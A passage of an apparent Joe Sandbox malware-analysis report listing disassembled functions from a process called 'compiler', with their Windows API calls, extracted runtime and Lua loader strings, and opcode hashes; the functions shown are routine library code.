                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2dd8f6c531d1c799fc5f430c633d6f224f5e7fe4b7ce748665619d18613bcb4f
                                                            • Instruction ID: c0d367462218af00b76eb091258bc14ce7b273a87967e3d4e8292ec30965455a
                                                            • Opcode Fuzzy Hash: 2dd8f6c531d1c799fc5f430c633d6f224f5e7fe4b7ce748665619d18613bcb4f
                                                            • Instruction Fuzzy Hash: 2351D362B1879194F720BB7AA8042AEBBA1EB627D4F944274EF5C47A8DDF3CD101C750
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADC87C0 Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00007FF7BADB90F8: GetLastError.KERNEL32(?,?,?,00007FF7BADBB43A,?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF7BADBB333), ref: 00007FF7BADB9107
                                                              • Part of subcall function 00007FF7BADB90F8: SetLastError.KERNEL32(?,?,?,00007FF7BADBB43A,?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF7BADBB333), ref: 00007FF7BADB91A5
                                                            • GetLocaleInfoW.KERNEL32 ref: 00007FF7BADC8828
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$InfoLocale
                                                            • String ID:
                                                            • API String ID: 3736152602-0
                                                            • Opcode ID: bcecd3a3357499b2c60e543b3248ba0b85e1b06a44e3c327d7d13f0694360693
                                                            • Instruction ID: e494f6b478fbd33a513327427d17bd50b8abc2ae18772db1babad933a4524f8a
                                                            • Opcode Fuzzy Hash: bcecd3a3357499b2c60e543b3248ba0b85e1b06a44e3c327d7d13f0694360693
                                                            • Instruction Fuzzy Hash: F9318E71B0868296FB24BA29E4417EDA290EB66780FC08179DF4D8368DEF3CE5018750
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADC840C Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00007FF7BADB90F8: GetLastError.KERNEL32(?,?,?,00007FF7BADBB43A,?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF7BADBB333), ref: 00007FF7BADB9107
                                                              • Part of subcall function 00007FF7BADB90F8: SetLastError.KERNEL32(?,?,?,00007FF7BADBB43A,?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF7BADBB333), ref: 00007FF7BADB91A5
                                                            • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF7BADC8BF7,?,00000001,?,00000000,?,00000000,?,00007FF7BADB5BF0), ref: 00007FF7BADC84AA
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                            • String ID:
                                                            • API String ID: 2417226690-0
                                                            • Opcode ID: a8011f44460d981dc4d9ec503e0f5a1f2e064a5884949d3675e477d8b1eebcb9
                                                            • Instruction ID: f8bcbee17a8c510444faca710dbed0abec16744a0b267925b09ec6c9be7ac2b8
                                                            • Opcode Fuzzy Hash: a8011f44460d981dc4d9ec503e0f5a1f2e064a5884949d3675e477d8b1eebcb9
                                                            • Instruction Fuzzy Hash: 5611F663E0C64595FB14AF29D0406ACB7A1F761BE0FC48135DB19432CCDA28D5D1C790
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADC89C8 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00007FF7BADB90F8: GetLastError.KERNEL32(?,?,?,00007FF7BADBB43A,?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF7BADBB333), ref: 00007FF7BADB9107
                                                              • Part of subcall function 00007FF7BADB90F8: SetLastError.KERNEL32(?,?,?,00007FF7BADBB43A,?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF7BADBB333), ref: 00007FF7BADB91A5
                                                            • GetLocaleInfoW.KERNEL32(?,?,?,00007FF7BADC8771), ref: 00007FF7BADC89FF
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$InfoLocale
                                                            • String ID:
                                                            • API String ID: 3736152602-0
                                                            • Opcode ID: 426467ffb6eabefc0f6384ff8cdc68db33cccfa5daffe6c866398dde8c3c6ec0
                                                            • Instruction ID: c158853f0a2cfe93a48c96defb7b39b82378ce1afc3b8cebea0452f0cd80aa30
                                                            • Opcode Fuzzy Hash: 426467ffb6eabefc0f6384ff8cdc68db33cccfa5daffe6c866398dde8c3c6ec0
                                                            • Instruction Fuzzy Hash: 97113A22B1C59296F7647759D040B7DA261EB62F60FC05175EF2E836CCEE3DEA818390
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADC84DC Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00007FF7BADB90F8: GetLastError.KERNEL32(?,?,?,00007FF7BADBB43A,?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF7BADBB333), ref: 00007FF7BADB9107
                                                              • Part of subcall function 00007FF7BADB90F8: SetLastError.KERNEL32(?,?,?,00007FF7BADBB43A,?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF7BADBB333), ref: 00007FF7BADB91A5
                                                            • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF7BADC8BB3,?,00000001,?,00000000,?,00000000,?,00007FF7BADB5BF0), ref: 00007FF7BADC855A
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                            • String ID:
                                                            • API String ID: 2417226690-0
                                                            • Opcode ID: f0f521fc5ee7437de8d7a74426470703f68c29db9607cb098be64c948bd7e9df
                                                            • Instruction ID: a7ef2aecf60f135b5d13f1ff6c62b7e5a99f57403643d81a781d478fa0513cfd
                                                            • Opcode Fuzzy Hash: f0f521fc5ee7437de8d7a74426470703f68c29db9607cb098be64c948bd7e9df
                                                            • Instruction Fuzzy Hash: 0901D262F1828156F7107F19E440FBDF691EB62BA4FC48271DB29076CCEF6894808750
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADB7718 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EnumSystemLocalesW.KERNEL32(?,?,00000000,00007FF7BADB7B59,?,?,?,?,?,?,?,?,00000000,00007FF7BADC7A58), ref: 00007FF7BADB7767
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: EnumLocalesSystem
                                                            • String ID:
                                                            • API String ID: 2099609381-0
                                                            • Opcode ID: f6f36773287d92e5bcf0b15b9bd467a71f94e6eafa44af215bb06dd445bd8063
                                                            • Instruction ID: 1a769c33c77700ca669c2c598b60d6b0eb0fd911aa3bfda57b09de24b7115132
                                                            • Opcode Fuzzy Hash: f6f36773287d92e5bcf0b15b9bd467a71f94e6eafa44af215bb06dd445bd8063
                                                            • Instruction Fuzzy Hash: 00F04B71A04B4683F704FB19E8501A9A261FBAA780F848175EF0D8736DDF2CD4508700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADC8D74 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: HeapProcess
                                                            • String ID:
                                                            • API String ID: 54951025-0
                                                            • Opcode ID: 839dc955af725a17fbc70c82449d45c992c3a028d6a01360b8d8584a8e7d1cbe
                                                            • Instruction ID: 9857a1e6864925806739fb4bfae18657b993fa134c1c38939ce68929b10dfb53
                                                            • Opcode Fuzzy Hash: 839dc955af725a17fbc70c82449d45c992c3a028d6a01360b8d8584a8e7d1cbe
                                                            • Instruction Fuzzy Hash: F4B09B10E07701C1F90937159C421145154BF69701FD540B8C54C41318DD2C35B54790
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADBD3E0 Relevance: .0, Instructions: 32COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e9022f70961cb6b5d4a07d36195ae044d4a44bfdab0e880868c45ba07e02253c
                                                            • Instruction ID: 8dc1a8206722465f54995564a5a9e161ea63e57ccc654010624e73888e5cbd04
                                                            • Opcode Fuzzy Hash: e9022f70961cb6b5d4a07d36195ae044d4a44bfdab0e880868c45ba07e02253c
                                                            • Instruction Fuzzy Hash: B6F068717182558AEB98AF2CA40363977D1F769384FC08479DB8D83B0CD63C94508F54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BAD8C698 Relevance: .0, Instructions: 2COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: aee8564befd8b60ed1451bc946cfb3bb6f2e88711e8db72fbd5396662902d536
                                                            • Instruction ID: aaf2e170c6afc1e939c458f67e898604bc083611009cb6d0901649b5ae1e7591
                                                            • Opcode Fuzzy Hash: aee8564befd8b60ed1451bc946cfb3bb6f2e88711e8db72fbd5396662902d536
                                                            • Instruction Fuzzy Hash: 09A0026190DC02F4F604BB48F855030A330FB76301BC010B5DA1D418BCAF3CA594D3B0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADB81B4 Relevance: 36.8, APIs: 10, Strings: 11, Instructions: 57COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • try_get_function.LIBVCRUNTIME ref: 00007FF7BADB81CF
                                                            • try_get_function.LIBVCRUNTIME ref: 00007FF7BADB81EE
                                                              • Part of subcall function 00007FF7BADB7794: GetProcAddress.KERNEL32(?,?,0000000100000002,00007FF7BADB7C72,?,?,?,00007FF7BADB92BE,?,?,?,00007FF7BADA9B4D), ref: 00007FF7BADB78EC
                                                            • try_get_function.LIBVCRUNTIME ref: 00007FF7BADB820D
                                                              • Part of subcall function 00007FF7BADB7794: LoadLibraryW.KERNELBASE(?,?,0000000100000002,00007FF7BADB7C72,?,?,?,00007FF7BADB92BE,?,?,?,00007FF7BADA9B4D), ref: 00007FF7BADB7837
                                                              • Part of subcall function 00007FF7BADB7794: GetLastError.KERNEL32(?,?,?,00007FF7BADB92BE,?,?,?,00007FF7BADA9B4D,?,?,?,?,00007FF7BADBE8F3), ref: 00007FF7BADB7845
                                                              • Part of subcall function 00007FF7BADB7794: LoadLibraryExW.KERNEL32(?,?,?,00007FF7BADB92BE,?,?,?,00007FF7BADA9B4D,?,?,?,?,00007FF7BADBE8F3), ref: 00007FF7BADB7887
                                                            • try_get_function.LIBVCRUNTIME ref: 00007FF7BADB822C
                                                              • Part of subcall function 00007FF7BADB7794: FreeLibrary.KERNEL32(?,?,?,00007FF7BADB92BE,?,?,?,00007FF7BADA9B4D,?,?,?,?,00007FF7BADBE8F3), ref: 00007FF7BADB78C0
                                                            • try_get_function.LIBVCRUNTIME ref: 00007FF7BADB824B
                                                            • try_get_function.LIBVCRUNTIME ref: 00007FF7BADB826A
                                                            • try_get_function.LIBVCRUNTIME ref: 00007FF7BADB8289
                                                            • try_get_function.LIBVCRUNTIME ref: 00007FF7BADB82A8
                                                            • try_get_function.LIBVCRUNTIME ref: 00007FF7BADB82C7
                                                            • try_get_function.LIBVCRUNTIME ref: 00007FF7BADB82E6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: try_get_function$Library$Load$AddressErrorFreeLastProc
                                                            • String ID: AreFileApisANSI$CompareStringEx$EnumSystemLocalesEx$GetDateFormatEx$GetLocaleInfoEx$GetTimeFormatEx$GetUserDefaultLocaleName$IsValidLocaleName$LCIDToLocaleName$LCMapStringEx$LocaleNameToLCID
                                                            • API String ID: 3255926029-3252031757
                                                            • Opcode ID: b4f1c1e6e73c0874dd5575894232cfc0eb37299b0857cae00cd2f6b053d66671
                                                            • Instruction ID: d9d0a7a7e88a7d7d6d65258dac6b2fdfad5ec502dec3cf6bf75938ceb1090974
                                                            • Opcode Fuzzy Hash: b4f1c1e6e73c0874dd5575894232cfc0eb37299b0857cae00cd2f6b053d66671
                                                            • Instruction Fuzzy Hash: CE316DA490AA4BA2F604FB6CD8416F59321EF27304FD081F7EA5D061BD9E7CA64DD360
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BAD56D74 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 179COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: wcsftime
                                                            • String ID: !$day$hour$isdst$min$month$sec$wday$yday$year
                                                            • API String ID: 2902305603-306814458
                                                            • Opcode ID: ece1e813863b017da32f1d2848ad15ee8384352b5559855b7ea918c500b7e698
                                                            • Instruction ID: 824955531c700ac7a2cd1ae2cf5581dc2bfdd41e73e28d7db59324ec7ee6590a
                                                            • Opcode Fuzzy Hash: ece1e813863b017da32f1d2848ad15ee8384352b5559855b7ea918c500b7e698
                                                            • Instruction Fuzzy Hash: 0171CF22F0865282FA14FB2AE5502BCA351EB67B90FD485B5EF5E07B8DDE3CE4058710
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADC3078 Relevance: 16.7, APIs: 11, Instructions: 163synchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle$CodeErrorExitLastObjectProcessSingleWait_invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 2936579111-0
                                                            • Opcode ID: 12ace58e4e9991eede78d41573ebb205ed0adca4ef56b4f28523c589ba870145
                                                            • Instruction ID: c99e22cffe7cdda71783dcc5fc49164ec706b6461e4c614dfb0b0299e6e0ef04
                                                            • Opcode Fuzzy Hash: 12ace58e4e9991eede78d41573ebb205ed0adca4ef56b4f28523c589ba870145
                                                            • Instruction Fuzzy Hash: 97613C62B09B4186FB10BF69D4401BCE3A1EB66B94BC405B5DF5E17B8CEE3CE45583A0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BAD576EC Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 292stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: strrchr
                                                            • String ID: 'module' not called from a Lua function$'package.loaders' must be a table$_LOADED$_NAME$_PACKAGE$loaders$loop or previous error loading module '%s'$module '%s' not found:%s
                                                            • API String ID: 3418686817-4002959293
                                                            • Opcode ID: 094103608cf1bb214d5ba942d90bae16f9f384a1ecb4fe3270fe0763efe3c481
                                                            • Instruction ID: 0393ee3532be57371dccbf4fbd5687669ce4cf620c2a76ccb5e8acb4b21f425d
                                                            • Opcode Fuzzy Hash: 094103608cf1bb214d5ba942d90bae16f9f384a1ecb4fe3270fe0763efe3c481
                                                            • Instruction Fuzzy Hash: E0B1D411F0868641FA10BB2A65152BAE391EFA7BD0FD45271EF0E1B79FDE3CE5018660
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADB9CA0 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 104COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                            • API String ID: 3215553584-2617248754
                                                            • Opcode ID: 42ff2b32442905bf651e6992794f6d50b4285004d5d442bf3aa4080282b3e68b
                                                            • Instruction ID: 47b670cbfad571c44f05167dd91a4ec1cdad5fd79eafa03a0bfea8b16f68d651
                                                            • Opcode Fuzzy Hash: 42ff2b32442905bf651e6992794f6d50b4285004d5d442bf3aa4080282b3e68b
                                                            • Instruction Fuzzy Hash: 2E416E32A05B8599F700EF29E8507AD73A5EB26788F808275EF9C07B9CDE38D425C350
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BAD4A0BC Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 40libraryloaderthreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$CreateCriticalInitializeLibraryLoadSectionThread
                                                            • String ID: timeBeginPeriod$timeEndPeriod$winmm.dll
                                                            • API String ID: 4260375681-184456188
                                                            • Opcode ID: acf9a821ca425e9cb7a0e31017a2117fd32b030a76addba075f40b4b8f1a29db
                                                            • Instruction ID: 5f5a5a4c1e52bc93da941396ca9cc4583b2b05c66bef63a104f1c320746b96d1
                                                            • Opcode Fuzzy Hash: acf9a821ca425e9cb7a0e31017a2117fd32b030a76addba075f40b4b8f1a29db
                                                            • Instruction Fuzzy Hash: 65111C62915B0292FB14FF29E454379A3A1FB66B09FC405B9CE4D4526CEF3DD458C3A0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADB0E60 Relevance: 12.7, APIs: 3, Strings: 4, Instructions: 481COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: -$f$p$p
                                                            • API String ID: 3215553584-2516539321
                                                            • Opcode ID: f503d1e6c5125fe476e0bc3c1a2f1aaf6babd3d3dbe2871944fb9032821d7284
                                                            • Instruction ID: 9144f94e3af56c6f9bba09e34ae7d517e417ca803a4a82796b99cbb45a490c49
                                                            • Opcode Fuzzy Hash: f503d1e6c5125fe476e0bc3c1a2f1aaf6babd3d3dbe2871944fb9032821d7284
                                                            • Instruction Fuzzy Hash: 7F126222E08343A6FB20BA19D1443B9F6A1FB62764FD44273FB99466DCDB3CE5508724
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

